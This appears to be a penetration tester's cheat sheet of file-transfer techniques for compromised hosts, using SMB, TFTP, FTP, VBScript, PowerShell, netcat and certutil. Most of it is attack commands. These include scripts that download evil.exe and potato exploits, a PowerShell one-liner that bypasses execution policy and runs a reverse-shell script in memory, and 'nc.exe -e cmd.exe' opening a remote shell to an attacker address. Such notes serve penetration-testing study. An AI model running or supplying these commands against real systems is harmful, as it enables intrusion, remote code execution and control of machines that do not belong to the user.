simple webserver
| python 2.7
python2 -m SimpleHTTPServer
| python3
python3 -m http.server
| ruby
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
| php
Smbsever (impacket)
impacket-smbserver
copy \\<ip>\<path>\<file> # Linux to windows
copy <file> \\<ip>\<path>\ # Windows to linux
| kali:
smbserver.py myshare /tmp/smbshare -smb2
| windows:
net use M: \\<kali-ip>\myshare
\\10.10.10.1\privesc.exe whoami
TFTP
hacker
rootkali: mkdir /tftp
root@kali: atftpd --daemon --port 69 \tftp\
root@kali: cp nc.exe \tftp
| target
C:ProgramFiles\SLmail\System> tftp -i 192.168.30.5 GET nc.exe
FTP
| hacker
root@kali: apt-get install pure-ftpd
root@kali: cat setup-ftp
root@kali: ./setup-ftp
root@kali: cat ftp.commands
echo open 192.168.58.5 21 > ftp.txt
echo offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
SCP
scp <fileToUpload> user@remote:/path
VBScript
Here is a good script to make a wget-clone in VB.
If it doesn't work try piping it through unix2dos before copying it.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
You then execute the script like this:
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
PowerShell
| Download File to path
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.14.5/JuicyPotato.exe','C:\users\merlin\documents\potato.exe')"
echo IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.10.3:8000/loli.txt','C:\Users\pelado\Desktop\loli.txt') | powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile
| Download testfile and executes it in the memory
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')"
|powershell full path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
| powershell wget
powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe 10.10.10.10 4444
wget.psl
| kali
echo $storageDir = $pwd > wget.psl
echo $webclient = New-Object System.Net.WebClient >>wget.psl
echo $url = "http://10.10.14.23:8000/PowerUp.ps1 >> wget.psl
echo $file = "new-exploit.exe" >>wget.psl
echo $webclient.DownloadFile($url,$file) >>wget.psl
| target:
C:\programs> copy y pasteo lo de arriba\\
C:\programs> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.psl \\
C:\programs> dir new-exploit.exe\\
cool\\
netcat
nc -lvp 1234 > <out_file>
nc <ip> 1234 < <in _file>
curl
curl <url> -o outfile
certutils
| windows
certutil.exe -urlcache -split -f "http://ip-addr:port/file" [output-file]